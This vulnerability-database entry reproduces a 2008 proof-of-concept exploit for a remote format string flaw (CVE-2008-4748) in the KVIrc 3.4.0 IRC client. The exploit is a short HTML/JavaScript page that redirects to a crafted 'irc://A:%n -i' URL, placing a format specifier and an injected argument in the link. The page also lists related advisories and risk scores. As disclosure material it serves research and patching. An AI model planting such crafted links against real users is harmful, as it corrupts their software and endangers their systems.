KVIrc 3.4.0 Virgo Remote Format String Exploit PoC

🗓️ 24 Oct 2008 00:00:00Reported by Gjoko KrsticType

zeroscience🔗 www.zeroscience.mk👁 136 Views

KVIrc 3.4.0 Virgo Remote Format String Vulnerabilit

Reporter	Title	Published	Views	Family All 9
Circl	CVE-2008-4748	24 Oct 200800:00	–	circl
CVE	CVE-2008-4748	27 Oct 200819:00	–	cve
Cvelist	CVE-2008-4748	27 Oct 200819:00	–	cvelist
Debian CVE	CVE-2008-4748	27 Oct 200819:00	–	debiancve
NVD	CVE-2008-4748	27 Oct 200820:00	–	nvd
OSV	OPENSUSE-SU-2024:10906-1 kvirc-5.0.0-4.3 on GA media	15 Jun 202400:00	–	osv
Prion	Format string	27 Oct 200820:00	–	prion
SUSE CVE	SUSE CVE-2008-4748	15 Feb 202306:06	–	susecve
UbuntuCve	CVE-2008-4748	27 Oct 200820:00	–	ubuntucve

<!--

 KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)

 Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit.
 KVirc is being written by Szymon Stefanek and the KVIrc Development Team with
 the contribution of many IRC addicted developers around the world.

 Product web page: http://www.kvirc.net/

 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

 liquidworm [t00t] gmail [d0t] com

 http://www.zeroscience.org

 24.10.2008

--><html>
<head><title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</title>
</head><body>
<center> <br/> <br/> <strong>Warning ! :)</strong> </center>
<script type="text/javascript">

alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008");

function poc()
{
	window.location.href = "irc://A:%n -i";
}

var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (answ == true) 
{
	poc();
}

	else
	{
		window.location.href = "http://www.kvirc.net";
	}

</script> </body></html>

24 Oct 2008 00:00Current

6.2Medium risk

Vulners AI Score6.2

CVSS 27.6

EPSS0.13802